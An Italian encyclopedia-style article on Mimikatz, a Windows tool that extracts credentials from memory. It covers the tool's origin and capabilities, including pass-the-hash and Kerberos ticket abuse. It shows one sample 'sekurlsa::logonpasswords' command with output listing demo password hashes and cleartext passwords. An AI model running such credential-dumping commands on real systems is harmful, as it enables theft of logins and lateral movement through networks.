# Mimikatz
Mimikatz è un programma gratuito e open source per Microsoft Windows che può essere utilizzato per ottenere informazioni riguardanti le credenziali di accesso. È stato sviluppato da Benjamin Delpy e Mr. Slovtsov.

## Storia
L’autore dichiara che Mimikatz è stato creato come progetto per apprendere il linguaggio C e i meccanismi interni di sicurezza di Windows. Mimikatz è nato nel 2007 ed è conosciuto anche attraverso diversi alias come: kdll, kdllpipe, katz, mimikatz.

## Caratteristiche
Mimikatz può estrarre dalla memoria password in chiaro, funzioni crittografiche hash, codice PIN e ticket Kerberos. Può anche eseguire pass-the-hash, pass-the-ticket, creare biglietti vincenti, lavorare su certificati o chiavi private e protette. Tali credenziali ottenute possono essere in seguito utilizzate per eseguire movimenti laterali e accedere a informazioni riservate. La maggior parte del software AntiVirus rileva i binari Mimikatz predefiniti.
Esempio che mostra come Mimikatz estrae le password: 
| Esempio che mostra come Mimikatz estrae le password |
| --- |
| mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 88038 (00000000:000157e6) Session : Interactive from 1 User Name : Gentil Kiwi Domain : vm-w7-ult SID : S-1-5-21-2044528444-627255920-3055224092-1000 msv : [00000003] Primary * Username : Gentil Kiwi * Domain : vm-w7-ult * LM : d0e9aee149655a6075e4540af1f22d3b * NTLM : cc36cf7a8514893efccd332446158b1a * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30 tspkg : * Username : Gentil Kiwi * Domain : vm-w7-ult * Password : waza1234/ wdigest : * Username : Gentil Kiwi * Domain : vm-w7-ult * Password : waza1234/ kerberos : * Username : Gentil Kiwi * Domain : vm-w7-ult * Password : waza1234/ ssp : [00000000] * Username : admin * Domain : nas * Password : anotherpassword credman : [00000000] * Username : nas\admin * Domain : nas.chocolate.local * Password : anotherpassword |

Mimikatz è stato anche trasferito su Metasploit.